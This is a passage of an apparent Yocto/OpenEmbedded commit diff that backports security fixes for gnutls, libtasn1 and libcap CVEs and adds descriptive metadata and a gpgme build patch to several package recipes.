139+ * channel that can be used as an oracle, so tread carefully */
140+
141+ /* Error handling logic:
142+ * In case decryption fails then don't inform the peer. Just use the
143+ * random key previously generated. (in order to avoid attack against
144+ * pkcs-1 formatting).
145+ *
146+ * If we get version mismatches no error is returned either. We
147+ * proceed normally. This is to defend against the attack described
148+ * in the paper "Attacking RSA-based sessions in SSL/TLS" by
149+ * Vlastimil Klima, Ondej Pokorny and Tomas Rosa.
150+ */
151+
152 /* This is here to avoid the version check attack
153 * discussed above.
154 */
155-
156- premaster_secret.data[0] = _gnutls_get_adv_version_major(session);
157- premaster_secret.data[1] = _gnutls_get_adv_version_minor(session);
158+ premaster_secret.data[0] = ver_maj;
159+ premaster_secret.data[1] = ver_min;
160
161 /* find the key of this username
162 */
163--- a/lib/gnutls_int.h
164+++ b/lib/gnutls_int.h
165@@ -989,7 +989,6 @@ struct gnutls_priority_st {
166 bool _no_etm;
167 bool _no_ext_master_secret;
168 bool _allow_key_usage_violation;
169- bool _allow_wrong_pms;
170 bool _dumbfw;
171 unsigned int _dh_prime_bits; /* old (deprecated) variable */
172
173@@ -1007,7 +1006,6 @@ struct gnutls_priority_st {
174 (x)->no_etm = 1; \
175 (x)->no_ext_master_secret = 1; \
176 (x)->allow_key_usage_violation = 1; \
177- (x)->allow_wrong_pms = 1; \
178 (x)->dumbfw = 1
179
180 #define ENABLE_PRIO_COMPAT(x) \
181@@ -1016,7 +1014,6 @@ struct gnutls_priority_st {
182 (x)->_no_etm = 1; \
183 (x)->_no_ext_master_secret = 1; \
184 (x)->_allow_key_usage_violation = 1; \
185- (x)->_allow_wrong_pms = 1; \
186 (x)->_dumbfw = 1
187
188 /* DH and RSA parameters types.
189@@ -1141,7 +1138,6 @@ typedef struct {
190 bool no_etm;
191 bool no_ext_master_secret;
192 bool allow_key_usage_violation;
193- bool allow_wrong_pms;
194 bool dumbfw;
195
196 /* old (deprecated) variable. This is used for both srp_prime_bits
197--- a/lib/priority.c
198+++ b/lib/priority.c
199@@ -681,7 +681,6 @@ gnutls_priority_set(gnutls_session_t ses
200 COPY_TO_INTERNALS(no_etm);
201 COPY_TO_INTERNALS(no_ext_master_secret);
202 COPY_TO_INTERNALS(allow_key_usage_violation);
203- COPY_TO_INTERNALS(allow_wrong_pms);
204 COPY_TO_INTERNALS(dumbfw);
205 COPY_TO_INTERNALS(dh_prime_bits);
206
diff --git a/meta/recipes-support/gnutls/gnutls/CVE-2024-0553.patch b/meta/recipes-support/gnutls/gnutls/CVE-2024-0553.patch
new file mode 100644
index 0000000000..f15c470879
--- /dev/null
+++ b/meta/recipes-support/gnutls/gnutls/CVE-2024-0553.patch
@@ -0,0 +1,125 @@
1From 40dbbd8de499668590e8af51a15799fbc430595e Mon Sep 17 00:00:00 2001
2From: Daiki Ueno <ueno@gnu.org>
3Date: Wed, 10 Jan 2024 19:13:17 +0900
4Subject: [PATCH] rsa-psk: minimize branching after decryption
5
6This moves any non-trivial code between gnutls_privkey_decrypt_data2
7and the function return in _gnutls_proc_rsa_psk_client_kx up until the
8decryption. This also avoids an extra memcpy to session->key.key.
9
10Signed-off-by: Daiki Ueno <ueno@gnu.org>
11
12Upstream-Status: Backport [https://gitlab.com/gnutls/gnutls/-/commit/40dbbd8de499668590e8af51a15799fbc430595e]
13CVE: CVE-2024-0553
14Signed-off-by: Vijay Anusuri <vanusuri@mvista.com>
15---
16 lib/auth/rsa_psk.c | 68 ++++++++++++++++++++++++----------------------
17 1 file changed, 35 insertions(+), 33 deletions(-)
18
19diff --git a/lib/auth/rsa_psk.c b/lib/auth/rsa_psk.c
20index 93c2dc9..c6cfb92 100644
21--- a/lib/auth/rsa_psk.c
22+++ b/lib/auth/rsa_psk.c
23@@ -269,7 +269,6 @@ _gnutls_proc_rsa_psk_client_kx(gnutls_session_t session, uint8_t * data,
24 int ret, dsize;
25 ssize_t data_size = _data_size;
26 gnutls_psk_server_credentials_t cred;
27- gnutls_datum_t premaster_secret = { NULL, 0 };
28 volatile uint8_t ver_maj, ver_min;
29
30 cred = (gnutls_psk_server_credentials_t)
31@@ -329,24 +328,48 @@ _gnutls_proc_rsa_psk_client_kx(gnutls_session_t session, uint8_t * data,
32 ver_maj = _gnutls_get_adv_version_major(session);
33 ver_min = _gnutls_get_adv_version_minor(session);
34
35- premaster_secret.data = gnutls_malloc(GNUTLS_MASTER_SIZE);
36- if (premaster_secret.data == NULL) {
37+ /* Find the key of this username. A random value will be
38+ * filled in if the key is not found.
39+ */
40+ ret = _gnutls_psk_pwd_find_entry(session, info->username,
41+ strlen(info->username), &pwd_psk);
42+ if (ret < 0)
43+ return gnutls_assert_val(ret);
44+
45+ /* Allocate memory for premaster secret, and fill in the
46+ * fields except the decryption result.
47+ */
48+ session->key.key.size = 2 + GNUTLS_MASTER_SIZE + 2 + pwd_psk.size;
49+ session->key.key.data = gnutls_malloc(session->key.key.size);
50+ if (session->key.key.data == NULL) {
51 gnutls_assert();
52+ _gnutls_free_key_datum(&pwd_psk);
53+ /* No need to zeroize, as the secret is not copied in yet */
54+ _gnutls_free_datum(&session->key.key);
55 return GNUTLS_E_MEMORY_ERROR;
56 }
57- premaster_secret.size = GNUTLS_MASTER_SIZE;
58
59 /* Fallback value when decryption fails. Needs to be unpredictable. */
60- ret = gnutls_rnd(GNUTLS_RND_NONCE, premaster_secret.data,
61- premaster_secret.size);
62+ ret = gnutls_rnd(GNUTLS_RND_NONCE, session->key.key.data + 2,
63+ GNUTLS_MASTER_SIZE);
64 if (ret < 0) {
65 gnutls_assert();
66- goto cleanup;
67+ _gnutls_free_key_datum(&pwd_psk);
68+ /* No need to zeroize, as the secret is not copied in yet */
69+ _gnutls_free_datum(&session->key.key);
70+ return ret;
71 }
72
73+ _gnutls_write_uint16(GNUTLS_MASTER_SIZE, session->key.key.data);
74+ _gnutls_write_uint16(pwd_psk.size,
75+ &session->key.key.data[2 + GNUTLS_MASTER_SIZE]);
76+ memcpy(&session->key.key.data[2 + GNUTLS_MASTER_SIZE + 2], pwd_psk.data,
77+ pwd_psk.size);
78+ _gnutls_free_key_datum(&pwd_psk);
79+
80 gnutls_privkey_decrypt_data2(session->internals.selected_key, 0,
81- &ciphertext, premaster_secret.data,
82- premaster_secret.size);
83+ &ciphertext, session->key.key.data + 2,
84+ GNUTLS_MASTER_SIZE);
85 /* After this point, any conditional on failure that cause differences
86 * in execution may create a timing or cache access pattern side
87 * channel that can be used as an oracle, so tread carefully */
88@@ -365,31 +388,10 @@ _gnutls_proc_rsa_psk_client_kx(gnutls_session_t session, uint8_t * data,
89 /* This is here to avoid the version check attack
90 * discussed above.
91 */
92- premaster_secret.data[0] = ver_maj;
93- premaster_secret.data[1] = ver_min;
94+ session->key.key.data[2] = ver_maj;
95+ session->key.key.data[3] = ver_min;
96
97- /* find the key of this username
98- */
99- ret =
100- _gnutls_psk_pwd_find_entry(session, info->username, strlen(info->username), &pwd_psk);
101- if (ret < 0) {
102- gnutls_assert();
103- goto cleanup;
104- }
105-
106- ret =
107- set_rsa_psk_session_key(session, &pwd_psk, &premaster_secret);
108- if (ret < 0) {
109- gnutls_assert();
110- goto cleanup;
111- }
112-
113- ret = 0;
114- cleanup:
115- _gnutls_free_key_datum(&pwd_psk);
116- _gnutls_free_temp_key_datum(&premaster_secret);
117-
118- return ret;
119+ return 0;
120 }
121
122 static int
123--
1242.25.1
125
diff --git a/meta/recipes-support/gnutls/gnutls_3.6.14.bb b/meta/recipes-support/gnutls/gnutls_3.6.14.bb
index 51578b4b3b..a1451daf2c 100644
--- a/meta/recipes-support/gnutls/gnutls_3.6.14.bb
+++ b/meta/recipes-support/gnutls/gnutls_3.6.14.bb
@@ -1,5 +1,7 @@
1SUMMARY = "GNU Transport Layer Security Library" 1SUMMARY = "GNU Transport Layer Security Library"
2HOMEPAGE = "http://www.gnu.org/software/gnutls/" 2DESCRIPTION = "a secure communications library implementing the SSL, \
3TLS and DTLS protocols and technologies around them."
4HOMEPAGE = "https://gnutls.org/"
3BUGTRACKER = "https://savannah.gnu.org/support/?group=gnutls" 5BUGTRACKER = "https://savannah.gnu.org/support/?group=gnutls"
4 6
5LICENSE = "GPLv3+ & LGPLv2.1+" 7LICENSE = "GPLv3+ & LGPLv2.1+"
@@ -21,6 +23,13 @@ SRC_URI = "https://www.gnupg.org/ftp/gcrypt/gnutls/v${SHRT_VER}/gnutls-${PV}.tar
21 file://arm_eabi.patch \ 23 file://arm_eabi.patch \
22 file://0001-Modied-the-license-to-GPLv2.1-to-keep-with-LICENSE-f.patch \ 24 file://0001-Modied-the-license-to-GPLv2.1-to-keep-with-LICENSE-f.patch \
23 file://CVE-2020-24659.patch \ 25 file://CVE-2020-24659.patch \
26 file://CVE-2021-20231.patch \
27 file://CVE-2021-20232.patch \
28 file://CVE-2022-2509.patch \
29 file://CVE-2021-4209.patch \
30 file://CVE-2023-0361.patch \
31 file://CVE-2023-5981.patch \
32 file://CVE-2024-0553.patch \
24" 33"
25 34
26SRC_URI[sha256sum] = "5630751adec7025b8ef955af4d141d00d252a985769f51b4059e5affa3d39d63" 35SRC_URI[sha256sum] = "5630751adec7025b8ef955af4d141d00d252a985769f51b4059e5affa3d39d63"
diff --git a/meta/recipes-support/gnutls/libtasn1/CVE-2021-46848.patch b/meta/recipes-support/gnutls/libtasn1/CVE-2021-46848.patch
new file mode 100644
index 0000000000..9a8ceecbe7
--- /dev/null
+++ b/meta/recipes-support/gnutls/libtasn1/CVE-2021-46848.patch
@@ -0,0 +1,45 @@
1From 22fd12b290adea788122044cb58dc9e77754644f Mon Sep 17 00:00:00 2001
2From: Vivek Kumbhar <vkumbhar@mvista.com>
3Date: Thu, 17 Nov 2022 12:07:50 +0530
4Subject: [PATCH] CVE-2021-46848
5
6Upstream-Status: Backport [https://gitlab.com/gnutls/libtasn1/-/commit/44a700d2051a666235748970c2df047ff207aeb5]
7CVE: CVE-2021-46848
8Signed-off-by: Vivek Kumbhar <vkumbhar@mvista.com>
9
10Fix ETYPE_OK off by one array size check.
11---
12 NEWS | 4 ++++
13 lib/int.h | 2 +-
14 2 files changed, 5 insertions(+), 1 deletion(-)
15
16diff --git a/NEWS b/NEWS
17index f042481..d8f684e 100644
18--- a/NEWS
19+++ b/NEWS
20@@ -1,5 +1,9 @@
21 GNU Libtasn1 NEWS -*- outline -*-
22
23+* Noteworthy changes in release ?.? (????-??-??) [?]
24+- Fix ETYPE_OK out of bounds read. Closes: #32.
25+- Update gnulib files and various maintenance fixes.
26+
27 * Noteworthy changes in release 4.16.0 (released 2020-02-01) [stable]
28 - asn1_decode_simple_ber: added support for constructed definite
29 octet strings. This allows this function decode the whole set of
30diff --git a/lib/int.h b/lib/int.h
31index ea16257..c877282 100644
32--- a/lib/int.h
33+++ b/lib/int.h
34@@ -97,7 +97,7 @@ typedef struct tag_and_class_st
35 #define ETYPE_TAG(etype) (_asn1_tags[etype].tag)
36 #define ETYPE_CLASS(etype) (_asn1_tags[etype].class)
37 #define ETYPE_OK(etype) (((etype) != ASN1_ETYPE_INVALID && \
38- (etype) <= _asn1_tags_size && \
39+ (etype) < _asn1_tags_size && \
40 _asn1_tags[(etype)].desc != NULL)?1:0)
41
42 #define ETYPE_IS_STRING(etype) ((etype == ASN1_ETYPE_GENERALSTRING || \
43--
442.25.1
45
diff --git a/meta/recipes-support/gnutls/libtasn1_4.16.0.bb b/meta/recipes-support/gnutls/libtasn1_4.16.0.bb
index 8337b70241..d2b3c492ec 100644
--- a/meta/recipes-support/gnutls/libtasn1_4.16.0.bb
+++ b/meta/recipes-support/gnutls/libtasn1_4.16.0.bb
@@ -1,4 +1,6 @@
1SUMMARY = "Library for ASN.1 and DER manipulation" 1SUMMARY = "Library for ASN.1 and DER manipulation"
2DESCRIPTION = "A highly portable C library that encodes and decodes \
3DER/BER data following an ASN.1 schema. "
2HOMEPAGE = "http://www.gnu.org/software/libtasn1/" 4HOMEPAGE = "http://www.gnu.org/software/libtasn1/"
3 5
4LICENSE = "GPLv3+ & LGPLv2.1+" 6LICENSE = "GPLv3+ & LGPLv2.1+"
@@ -10,6 +12,7 @@ LIC_FILES_CHKSUM = "file://doc/COPYING;md5=d32239bcb673463ab874e80d47fae504 \
10 12
11SRC_URI = "${GNU_MIRROR}/libtasn1/libtasn1-${PV}.tar.gz \ 13SRC_URI = "${GNU_MIRROR}/libtasn1/libtasn1-${PV}.tar.gz \
12 file://dont-depend-on-help2man.patch \ 14 file://dont-depend-on-help2man.patch \
15 file://CVE-2021-46848.patch \
13 " 16 "
14 17
15DEPENDS = "bison-native" 18DEPENDS = "bison-native"
diff --git a/meta/recipes-support/gpgme/gpgme/0001-use-closefrom-on-linux-and-glibc-2.34.patch b/meta/recipes-support/gpgme/gpgme/0001-use-closefrom-on-linux-and-glibc-2.34.patch
new file mode 100644
index 0000000000..1c46684c6d
--- /dev/null
+++ b/meta/recipes-support/gpgme/gpgme/0001-use-closefrom-on-linux-and-glibc-2.34.patch
@@ -0,0 +1,24 @@
1From adb1d4e5498a19e9d591ac8f42f9ddfdb23a1354 Mon Sep 17 00:00:00 2001
2From: Khem Raj <raj.khem@gmail.com>
3Date: Thu, 15 Jul 2021 12:33:13 -0700
4Subject: [PATCH] use closefrom() on linux and glibc 2.34+
5
6Upstream-Status: Pending
7Signed-off-by: Khem Raj <raj.khem@gmail.com>
8---
9 src/posix-io.c | 2 +-
10 1 file changed, 1 insertion(+), 1 deletion(-)
11
12diff --git a/src/posix-io.c b/src/posix-io.c
13index e712ef2..ab8ded9 100644
14--- a/src/posix-io.c
15+++ b/src/posix-io.c
16@@ -570,7 +570,7 @@ _gpgme_io_spawn (const char *path, char *const argv[], unsigned int flags,
17 if (fd_list[i].fd > fd)
18 fd = fd_list[i].fd;
19 fd++;
20-#if defined(__sun) || defined(__FreeBSD__)
21+#if defined(__sun) || defined(__FreeBSD__) || (defined(__GLIBC__) && __GNUC_PREREQ(2, 34))
22 closefrom (fd);
23 max_fds = fd;
24 #else /*!__sun */
diff --git a/meta/recipes-support/gpgme/gpgme_1.13.1.bb b/meta/recipes-support/gpgme/gpgme_1.13.1.bb
index 6e945d3165..dacc9896e4 100644
--- a/meta/recipes-support/gpgme/gpgme_1.13.1.bb
+++ b/meta/recipes-support/gpgme/gpgme_1.13.1.bb
@@ -20,7 +20,8 @@ SRC_URI = "${GNUPG_MIRROR}/gpgme/${BP}.tar.bz2 \
20 file://0006-fix-build-path-issue.patch \ 20 file://0006-fix-build-path-issue.patch \
21 file://0007-python-Add-variables-to-tests.patch \ 21 file://0007-python-Add-variables-to-tests.patch \
22 file://0008-do-not-auto-check-var-PYTHON.patch \ 22 file://0008-do-not-auto-check-var-PYTHON.patch \
23 " 23 file://0001-use-closefrom-on-linux-and-glibc-2.34.patch \
24 "
24 25
25SRC_URI[md5sum] = "198f0a908ec3cd8f0ce9a4f3a4489645" 26SRC_URI[md5sum] = "198f0a908ec3cd8f0ce9a4f3a4489645"
26SRC_URI[sha256sum] = "c4e30b227682374c23cddc7fdb9324a99694d907e79242a25a4deeedb393be46" 27SRC_URI[sha256sum] = "c4e30b227682374c23cddc7fdb9324a99694d907e79242a25a4deeedb393be46"
diff --git a/meta/recipes-support/iso-codes/iso-codes_4.4.bb b/meta/recipes-support/iso-codes/iso-codes_4.4.bb
index 4767dea84c..e8210eca9b 100644
--- a/meta/recipes-support/iso-codes/iso-codes_4.4.bb
+++ b/meta/recipes-support/iso-codes/iso-codes_4.4.bb
@@ -1,11 +1,14 @@
1SUMMARY = "ISO language, territory, currency, script codes and their translations" 1SUMMARY = "ISO language, territory, currency, script codes and their translations"
2DESCRIPTION = "Provides lists of various ISO standards (e.g. country, \
3language, language scripts, and currency names) in one place, rather \
4than repeated in many programs throughout the system."
2HOMEPAGE = "https://salsa.debian.org/iso-codes-team/iso-codes" 5HOMEPAGE = "https://salsa.debian.org/iso-codes-team/iso-codes"
3BUGTRACKER = "https://salsa.debian.org/iso-codes-team/iso-codes/issues" 6BUGTRACKER = "https://salsa.debian.org/iso-codes-team/iso-codes/issues"
4 7
5LICENSE = "LGPLv2.1" 8LICENSE = "LGPLv2.1"
6LIC_FILES_CHKSUM = "file://COPYING;md5=4fbd65380cdd255951079008b364516c" 9LIC_FILES_CHKSUM = "file://COPYING;md5=4fbd65380cdd255951079008b364516c"
7 10
8SRC_URI = "git://salsa.debian.org/iso-codes-team/iso-codes.git;protocol=http;branch=main;" 11SRC_URI = "git://salsa.debian.org/iso-codes-team/iso-codes.git;protocol=https;branch=main;"
9SRCREV = "38edb926592954b87eb527124da0ec68d2a748f3" 12SRCREV = "38edb926592954b87eb527124da0ec68d2a748f3"
10 13
11# inherit gettext cannot be used, because it adds gettext-native to BASEDEPENDS which 14# inherit gettext cannot be used, because it adds gettext-native to BASEDEPENDS which
diff --git a/meta/recipes-support/itstool/itstool_2.0.6.bb b/meta/recipes-support/itstool/itstool_2.0.6.bb
index 5f358f463d..54105af5f0 100644
--- a/meta/recipes-support/itstool/itstool_2.0.6.bb
+++ b/meta/recipes-support/itstool/itstool_2.0.6.bb
@@ -1,4 +1,8 @@
1SUMMARY = "ITS Tool allows you to translate your XML documents with PO files" 1SUMMARY = "ITS Tool allows you to translate your XML documents with PO files"
2DESCRIPTION = "It extracts messages from XML files and outputs PO template \
3files, then merges translations from MO files to create translated \
4XML files. It determines what to translate and how to chunk it into \
5messages using the W3C Internationalization Tag Set (ITS). "
2HOMEPAGE = "http://itstool.org/" 6HOMEPAGE = "http://itstool.org/"
3LICENSE = "GPLv3" 7LICENSE = "GPLv3"
4LIC_FILES_CHKSUM = "file://COPYING;md5=59c57b95fd7d0e9e238ebbc7ad47c5a5" 8LIC_FILES_CHKSUM = "file://COPYING;md5=59c57b95fd7d0e9e238ebbc7ad47c5a5"
diff --git a/meta/recipes-support/libassuan/libassuan_2.5.3.bb b/meta/recipes-support/libassuan/libassuan_2.5.3.bb
index 52b4c0f1b9..9ef5074120 100644
--- a/meta/recipes-support/libassuan/libassuan_2.5.3.bb
+++ b/meta/recipes-support/libassuan/libassuan_2.5.3.bb
@@ -1,4 +1,7 @@
1SUMMARY = "IPC library used by GnuPG and GPGME" 1SUMMARY = "IPC library used by GnuPG and GPGME"
2DESCRIPTION = "A small library implementing the so-called Assuan protocol. \
3This protocol is used for IPC between most newer GnuPG components. \
4Both, server and client side functions are provided. "
2HOMEPAGE = "http://www.gnupg.org/related_software/libassuan/" 5HOMEPAGE = "http://www.gnupg.org/related_software/libassuan/"
3BUGTRACKER = "https://bugs.g10code.com/gnupg/index" 6BUGTRACKER = "https://bugs.g10code.com/gnupg/index"
4 7
diff --git a/meta/recipes-support/libatomic-ops/libatomic-ops_7.6.10.bb b/meta/recipes-support/libatomic-ops/libatomic-ops_7.6.10.bb
index 7628eedb1b..3089d1f7ff 100644
--- a/meta/recipes-support/libatomic-ops/libatomic-ops_7.6.10.bb
+++ b/meta/recipes-support/libatomic-ops/libatomic-ops_7.6.10.bb
@@ -1,4 +1,5 @@
1SUMMARY = "A library for atomic integer operations" 1SUMMARY = "A library for atomic integer operations"
2DESCRIPTION = "Package provides semi-portable access to hardware-provided atomic memory update operations on a number of architectures."
2HOMEPAGE = "https://github.com/ivmai/libatomic_ops/" 3HOMEPAGE = "https://github.com/ivmai/libatomic_ops/"
3SECTION = "optional" 4SECTION = "optional"
4PROVIDES += "libatomics-ops" 5PROVIDES += "libatomics-ops"
diff --git a/meta/recipes-support/libbsd/libbsd_0.10.0.bb b/meta/recipes-support/libbsd/libbsd_0.10.0.bb
index 5b32b9af41..58925738cb 100644
--- a/meta/recipes-support/libbsd/libbsd_0.10.0.bb
+++ b/meta/recipes-support/libbsd/libbsd_0.10.0.bb
@@ -29,6 +29,12 @@ HOMEPAGE = "https://libbsd.freedesktop.org/wiki/"
29# License: public-domain-Colin-Plumb 29# License: public-domain-Colin-Plumb
30LICENSE = "BSD-3-Clause & BSD-4-Clause & ISC & PD" 30LICENSE = "BSD-3-Clause & BSD-4-Clause & ISC & PD"
31LICENSE_${PN} = "BSD-3-Clause & ISC & PD" 31LICENSE_${PN} = "BSD-3-Clause & ISC & PD"
32LICENSE:${PN}-dbg = "BSD-3-Clause & ISC & PD"
33LICENSE:${PN}-dev = "BSD-3-Clause & ISC & PD"
34LICENSE:${PN}-doc = "BSD-3-Clause & BSD-4-Clause & ISC & PD"
35LICENSE:${PN}-locale = "BSD-3-Clause & ISC & PD"
36LICENSE:${PN}-src = "BSD-3-Clause & ISC & PD"
37LICENSE:${PN}-staticdev = "BSD-3-Clause & ISC & PD"
32LIC_FILES_CHKSUM = "file://COPYING;md5=2120be0173469a06ed185b688e0e1ae0" 38LIC_FILES_CHKSUM = "file://COPYING;md5=2120be0173469a06ed185b688e0e1ae0"
33SECTION = "libs" 39SECTION = "libs"
34 40
diff --git a/meta/recipes-support/libcap/files/CVE-2023-2602.patch b/meta/recipes-support/libcap/files/CVE-2023-2602.patch
new file mode 100644
index 0000000000..ca04d7297a
--- /dev/null
+++ b/meta/recipes-support/libcap/files/CVE-2023-2602.patch
@@ -0,0 +1,52 @@
1Backport of:
2
3From bc6b36682f188020ee4770fae1d41bde5b2c97bb Mon Sep 17 00:00:00 2001
4From: "Andrew G. Morgan" <morgan@kernel.org>
5Date: Wed, 3 May 2023 19:18:36 -0700
6Subject: Correct the check of pthread_create()'s return value.
7
8This function returns a positive number (errno) on error, so the code
9wasn't previously freeing some memory in this situation.
10
11Discussion:
12
13 https://stackoverflow.com/a/3581020/14760867
14
15Credit for finding this bug in libpsx goes to David Gstir of
16X41 D-Sec GmbH (https://x41-dsec.de/) who performed a security
17audit of the libcap source code in April of 2023. The audit
18was sponsored by the Open Source Technology Improvement Fund
19(https://ostif.org/).
20
21Audit ref: LCAP-CR-23-01 (CVE-2023-2602)
22
23Signed-off-by: Andrew G. Morgan <morgan@kernel.org>
24
25Upstream-Status: Backport [import from ubuntu https://git.launchpad.net/ubuntu/+source/libcap2/tree/debian/patches/CVE-2023-2602.patch?h=ubuntu/focal-security
26Upstream commit https://git.kernel.org/pub/scm/libs/libcap/libcap.git/commit/?id=bc6b36682f188020ee4770fae1d41bde5b2c97bb]
27CVE: CVE-2023-2602
28Signed-off-by: Vijay Anusuri <vanusuri@mvista.com>
29---
30 psx/psx.c | 2 +-
31 1 file changed, 1 insertion(+), 1 deletion(-)
32
33--- a/libcap/psx.c
34+++ b/libcap/psx.c
35@@ -272,7 +272,7 @@ int psx_pthread_create(pthread_t *thread
36
37 psx_wait_for_idle();
38 int ret = pthread_create(thread, attr, start_routine, arg);
39- if (ret != -1) {
40+ if (ret == 0) {
41 psx_do_registration(*thread);
42 }
43 psx_resume_idle();
44@@ -287,7 +287,7 @@ int __wrap_pthread_create(pthread_t *thr
45 void *(*start_routine) (void *), void *arg) {
46 psx_wait_for_idle();
47 int ret = __real_pthread_create(thread, attr, start_routine, arg);
48- if (ret != -1) {
49+ if (ret == 0) {
50 psx_do_registration(*thread);
51 }
52 psx_resume_idle();
diff --git a/meta/recipes-support/libcap/files/CVE-2023-2603.patch b/meta/recipes-support/libcap/files/CVE-2023-2603.patch
new file mode 100644
index 0000000000..cf86ac2a46
--- /dev/null
+++ b/meta/recipes-support/libcap/files/CVE-2023-2603.patch
@@ -0,0 +1,58 @@
1Backport of:
2
3From 422bec25ae4a1ab03fd4d6f728695ed279173b18 Mon Sep 17 00:00:00 2001
4From: "Andrew G. Morgan" <morgan@kernel.org>
5Date: Wed, 3 May 2023 19:44:22 -0700
6Subject: Large strings can confuse libcap's internal strdup code.
7
8Avoid something subtle with really long strings: 1073741823 should
9be enough for anybody. This is an improved fix over something attempted
10in libcap-2.55 to address some static analysis findings.
11
12Reviewing the library, cap_proc_root() and cap_launcher_set_chroot()
13are the only two calls where the library is potentially exposed to a
14user controlled string input.
15
16Credit for finding this bug in libcap goes to Richard Weinberger of
17X41 D-Sec GmbH (https://x41-dsec.de/) who performed a security audit
18of the libcap source code in April of 2023. The audit was sponsored
19by the Open Source Technology Improvement Fund (https://ostif.org/).
20
21Audit ref: LCAP-CR-23-02 (CVE-2023-2603)
22
23Signed-off-by: Andrew G. Morgan <morgan@kernel.org>
24
25Upstream-Status: Backport [import from ubuntu https://git.launchpad.net/ubuntu/+source/libcap2/tree/debian/patches/CVE-2023-2603.patch?h=ubuntu/focal-security
26Upstream commit https://git.kernel.org/pub/scm/libs/libcap/libcap.git/commit/?id=422bec25ae4a1ab03fd4d6f728695ed279173b18]
27CVE: CVE-2023-2603
28Signed-off-by: Vijay Anusuri <vanusuri@mvista.com>
29---
30 libcap/cap_alloc.c | 12 +++++++-----
31 1 file changed, 7 insertions(+), 5 deletions(-)
32
33--- a/libcap/cap_alloc.c
34+++ b/libcap/cap_alloc.c
35@@ -76,13 +76,22 @@ cap_t cap_init(void)
36 char *_libcap_strdup(const char *old)
37 {
38 __u32 *raw_data;
39+ size_t len;
40
41 if (old == NULL) {
42 errno = EINVAL;
43 return NULL;
44 }
45
46- raw_data = malloc( sizeof(__u32) + strlen(old) + 1 );
47+ len = strlen(old);
48+ if ((len & 0x3fffffff) != len) {
49+ _cap_debug("len is too long for libcap to manage");
50+ errno = EINVAL;
51+ return NULL;
52+ }
53+ len += sizeof(__u32) + 1;
54+
55+ raw_data = malloc(len);
56 if (raw_data == NULL) {
57 errno = ENOMEM;
58 return NULL;
diff --git a/meta/recipes-support/libcap/libcap_2.32.bb b/meta/recipes-support/libcap/libcap_2.32.bb
index d78a58f7d2..64d5190aa7 100644
--- a/meta/recipes-support/libcap/libcap_2.32.bb
+++ b/meta/recipes-support/libcap/libcap_2.32.bb
@@ -1,8 +1,10 @@
1SUMMARY = "Library for getting/setting POSIX.1e capabilities" 1SUMMARY = "Library for getting/setting POSIX.1e capabilities"
2DESCRIPTION = "A library providing the API to access POSIX capabilities. \
3These allow giving various kinds of specific privileges to individual \
4users, without giving them full root permissions."
2HOMEPAGE = "http://sites.google.com/site/fullycapable/" 5HOMEPAGE = "http://sites.google.com/site/fullycapable/"
3
4# no specific GPL version required 6# no specific GPL version required
5LICENSE = "BSD | GPLv2" 7LICENSE = "BSD-3-Clause | GPLv2"
6LIC_FILES_CHKSUM = "file://License;md5=3f84fd6f29d453a56514cb7e4ead25f1" 8LIC_FILES_CHKSUM = "file://License;md5=3f84fd6f29d453a56514cb7e4ead25f1"
7 9
8DEPENDS = "hostperl-runtime-native gperf-native" 10DEPENDS = "hostperl-runtime-native gperf-native"
@@ -11,6 +13,8 @@ SRC_URI = "${KERNELORG_MIRROR}/linux/libs/security/linux-privs/${BPN}2/${BPN}-${
11 file://0001-ensure-the-XATTR_NAME_CAPS-is-defined-when-it-is-use.patch \ 13 file://0001-ensure-the-XATTR_NAME_CAPS-is-defined-when-it-is-use.patch \
12 file://0002-tests-do-not-run-target-executables.patch \ 14 file://0002-tests-do-not-run-target-executables.patch \
13 file://0001-tests-do-not-statically-link-a-test.patch \ 15 file://0001-tests-do-not-statically-link-a-test.patch \
16 file://CVE-2023-2602.patch \
17 file://CVE-2023-2603.patch \
14 " 18 "
15SRC_URI[md5sum] = "7416119c9fdcfd0e8dd190a432c668e9" 19SRC_URI[md5sum] = "7416119c9fdcfd0e8dd190a432c668e9"
16SRC_URI[sha256sum] = "1005e3d227f2340ad1e3360ef8b69d15e3c72a29c09f4894d7aac038bd26e2be" 20SRC_URI[sha256sum] = "1005e3d227f2340ad1e3360ef8b69d15e3c72a29c09f4894d7aac038bd26e2be"
diff --git a/meta/recipes-support/libcheck/libcheck_0.14.0.bb b/meta/recipes-support/libcheck/libcheck_0.14.0.bb
index a88f009cdb..57963d83d4 100644
--- a/meta/recipes-support/libcheck/libcheck_0.14.0.bb
+++ b/meta/recipes-support/libcheck/libcheck_0.14.0.bb
@@ -1,4 +1,9 @@
1SUMMARY = "Check - unit testing framework for C code" 1SUMMARY = "Check - unit testing framework for C code"
2DESCRIPTION = "It features a simple interface for defining unit tests, \
3putting little in the way of the developer. Tests are run in a separate \
4address space, so both assertion failures and code errors that cause \
5segmentation faults or other signals can be caught. Test results are \
6reportable in the following: Subunit, TAP, XML, and a generic logging format."
2HOMEPAGE = "https://libcheck.github.io/check/" 7HOMEPAGE = "https://libcheck.github.io/check/"
3SECTION = "devel" 8SECTION = "devel"
4 9
diff --git a/meta/recipes-support/libcroco/libcroco_0.6.13.bb b/meta/recipes-support/libcroco/libcroco_0.6.13.bb
index a443ff23fe..66ee647ffa 100644
--- a/meta/recipes-support/libcroco/libcroco_0.6.13.bb
+++ b/meta/recipes-support/libcroco/libcroco_0.6.13.bb
@@ -1,4 +1,7 @@
1SUMMARY = "Cascading Style Sheet (CSS) parsing and manipulation toolkit" 1SUMMARY = "Cascading Style Sheet (CSS) parsing and manipulation toolkit"
2DESCRIPTION = "The Libcroco project is an effort to build a generic \
3Cascading Style Sheet (CSS) parsing and manipulation toolkit that can be \
4used by GNOME applications in need of CSS support."
2HOMEPAGE = "http://www.gnome.org/" 5HOMEPAGE = "http://www.gnome.org/"
3BUGTRACKER = "https://bugzilla.gnome.org/" 6BUGTRACKER = "https://bugzilla.gnome.org/"
4 7
diff --git a/meta/recipes-support/libdaemon/libdaemon_0.14.bb b/meta/recipes-support/libdaemon/libdaemon_0.14.bb
index 070ee1890e..85a30bcac3 100644
--- a/meta/recipes-support/libdaemon/libdaemon_0.14.bb
+++ b/meta/recipes-support/libdaemon/libdaemon_0.14.bb
@@ -1,4 +1,8 @@
1SUMMARY = "Lightweight C library which eases the writing of UNIX daemons" 1SUMMARY = "Lightweight C library which eases the writing of UNIX daemons"
2DESCRIPTION = "Lightweight daemon framework for OpenBSD. It provides \
3facilities for logging and a signal handler to enable graceful shutdown, \
4as well as file locking to ensure that only a single copy of a given daemon \
5is running at a time."
